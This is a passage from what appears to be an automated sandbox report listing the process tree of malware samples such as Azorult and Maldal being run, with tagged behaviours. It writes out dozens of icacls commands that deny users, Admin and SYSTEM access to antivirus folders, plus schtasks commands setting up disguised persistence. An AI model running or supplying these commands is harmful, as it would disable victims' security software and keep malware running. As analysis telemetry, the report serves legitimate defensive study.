  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1912
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1052
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2936
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:940
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4912
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:364
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1604
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:4412
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:1088
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2252
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:3212
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4220
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    PID:1444
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1852
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3384
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:620
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2832
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:688
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2076
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2052
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4080
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4532
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:452
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1852
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4064
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1992
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2264
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2468
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1932
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4328
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:372
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:4124
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2568
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:688
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3512
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1108
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3468
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:4912
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4376
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4492
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3836
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:776
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3460
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2508
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4496
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1088
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3492
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:184
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:620
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3512
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:3700
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3744
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2408
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4572
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3460
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1912
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6032,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=7080 /prefetch:8
  2⤵
  PID:620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7084,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6816 /prefetch:8
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6396,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=7140 /prefetch:8
  2⤵
  PID:3892
- C:\Users\Admin\Downloads\Maldal.a.exe
  "C:\Users\Admin\Downloads\Maldal.a.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:3244
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Flopy.vbs"
    3⤵
    PID:6724
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Flopy.vbs"
    3⤵
    PID:6284
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Flopy.vbs"
    3⤵
    PID:5596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6588,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6888 /prefetch:8
  2⤵
  PID:960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7096,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=4408 /prefetch:8
  2⤵
  PID:6620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6552,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5968 /prefetch:8
  2⤵
  PID:5920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6980,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6964 /prefetch:8
  2⤵
  PID:5624
- C:\Users\Admin\Downloads\Mari.exe
  "C:\Users\Admin\Downloads\Mari.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3760,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3732,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  PID:5932
- C:\Users\Admin\Downloads\MeltingScreen.exe
  "C:\Users\Admin\Downloads\MeltingScreen.exe"
  2⤵
  PID:3200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3352,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6464 /prefetch:8
  2⤵
  PID:7072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5684,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6612 /prefetch:8
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7056,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=3044 /prefetch:8
  2⤵
  PID:6684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7152,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  PID:5456
- C:\Users\Admin\Downloads\NakedWife.exe
  "C:\Users\Admin\Downloads\NakedWife.exe"
  2⤵
  PID:6116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6996,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6988 /prefetch:8
  2⤵
  PID:6984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5660,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6820 /prefetch:8
  2⤵
  PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5752,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=7092 /prefetch:8
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7020,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6080 /prefetch:8
  2⤵
  PID:6592
- C:\Users\Admin\Downloads\MyPics.a.exe
  "C:\Users\Admin\Downloads\MyPics.a.exe"
  2⤵
  PID:6096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6872,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6836 /prefetch:8
  2⤵
  PID:7764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7148,i,14219620173118446279,8336575793252938500,262144 --variations-seed-version=20250128-180236.310000 --mojo-platform-channel-handle=6488 /prefetch:8
  2⤵
  PID:1932
- C:\Program Files\Google\Chrome\Application\chrome.exe
